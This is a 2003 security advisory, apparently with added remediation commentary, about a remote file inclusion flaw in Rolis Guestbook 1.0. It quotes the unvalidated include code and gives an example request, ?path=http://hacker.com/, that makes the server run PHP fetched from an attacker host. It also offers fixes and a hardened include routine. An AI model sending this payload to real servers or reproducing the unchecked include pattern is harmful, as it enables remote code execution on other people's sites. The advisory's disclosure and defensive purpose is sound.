Rolis Guestbook v1.0 - PHP injection
RusH security team | http://www.rsteam.ru
o----------------------------=[ Advisory #13 ]=----------------------------o
oxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxo
o--------------------------------------------------------------------------o
| Product: Rolis Guestbook |
| Version: 1.0 |
| Vulnerability: PHP injection |
| Vendor: Koch Roland (roli.ko@xxxxxx) |
| OffSite: www.roli.at |
| Vendor status: The vendor has been informed |
o--------------------------------------------------------------------------o
| Date: 16/11/2003 |
| Author: 1dt.w0lf // RsT |
o--------------------------------------------------------------------------o
o-------------------------=[ Problem ]:::
Bug found in file insert.inc.php
The script builds include paths from $path without ever setting or checking
that variable. With register_globals enabled, $path can be supplied in the
request (e.g. ?path=http://...), and with allow_url_fopen on, include() will
fetch the named files from that URL and execute them as PHP on the server.
The advisory calls this PHP injection; it is an unvalidated include path,
i.e. remote file inclusion:
<?php
include ($path . "data.inc.php");
include ($path . "header.inc.php");
include($path . "connection_data.inc.php");
[ snip ]
o-------------------------=[ Example ]:::
www.site.com/rolis_book_path/insert.inc.php?path=http://hacker.com/
where the attacker's server hosts the three included files, each containing
PHP code of the attacker's choosing, which then runs on www.site.com:
http://hacker.com/data.inc.php
http://hacker.com/header.inc.php
http://hacker.com/connection_data.inc.php
o------------------------=[ Solution ]:::
Edit insert.inc.php:
<?php
include ("path.inc.php"); <-- insert this line
include ($path . "data.inc.php");
...
This only closes the hole if path.inc.php assigns $path unconditionally
($path = "...";, not if (!isset($path))), so that a value injected through
the request is overwritten before the first include runs. Hardcoding the
directory in insert.inc.php itself is simpler and has no such pitfall.
Independently of the code fix, set register_globals = Off so request
parameters no longer become variables, and turn off allow_url_fopen (PHP 4
and PHP 5.0/5.1; allow_url_include in PHP 5.2 and later) so include() cannot
load code over HTTP at all.
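The following hardened include prologue is an added example, not code from Rolis Guestbook or from the advisory. It keeps the three file names the advisory quotes; the safe_include_dir() helper, the fixed base directory and the constructed attacker value are assumptions. It fixes the directory unconditionally (the minimal fix) and, for the case where the directory must stay configurable, validates the candidate against the guestbook directory instead of trusting it.

```php
<?php
// Added example: hardened include prologue for insert.inc.php. This is not
// Rolis Guestbook code; the file names come from the advisory, everything
// else (helper name, directory layout, sample attacker value) is assumed.

// The include directory is fixed to the script's own directory and assigned
// unconditionally, so a $path injected via register_globals (?path=...) is
// overwritten before it is ever used.
$base = dirname(__FILE__);
$path = $base . '/';

// If the directory really must be configurable, validate the candidate
// instead of trusting it: it has to resolve to an existing local directory
// at or below $base. A URL such as http://hacker.com/ does not exist on the
// local filesystem, so realpath() returns false and it is refused; so is a
// "../" escape, and so is a sibling directory that merely shares the prefix
// (/www/gb2 next to /www/gb), which a bare strncmp() would let through.
function safe_include_dir($candidate, $base)
{
    $real = realpath($candidate);
    $base = realpath($base);
    if ($real === false || $base === false || !is_dir($real)) {
        return false;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($real !== $base && strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return $real . '/';
}

// Constructed request value, taken from the advisory's example URL.
$requested = 'http://hacker.com/';
$dir = safe_include_dir($requested, $base);
if ($dir !== false) {
    $path = $dir;
}
// The remote URL was rejected, so $path is still $base . '/' here and the
// includes below can only load the guestbook's own files.

include($path . 'data.inc.php');
include($path . 'header.inc.php');
include($path . 'connection_data.inc.php');
```

Note that the fixed assignment at the top is what actually closes the advisory's hole; safe_include_dir() is only needed if an administrator-configurable directory is kept, and it must never fall back to the tainted value when validation fails.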
o--------------------=[ for contacts ]:::
1dt.w0lf - idtwolf[at]pisem[dot]net
RusH team - r00t[at]rsteam[dot]ru
web - www.rsteam.ru
o------------------------------=[ RU ]:::
A Russian version of this advisory is available here:
http://rst.void.ru/texts/advisory13.htm
o---------------------------------=[ EOF ]=--------------------------------o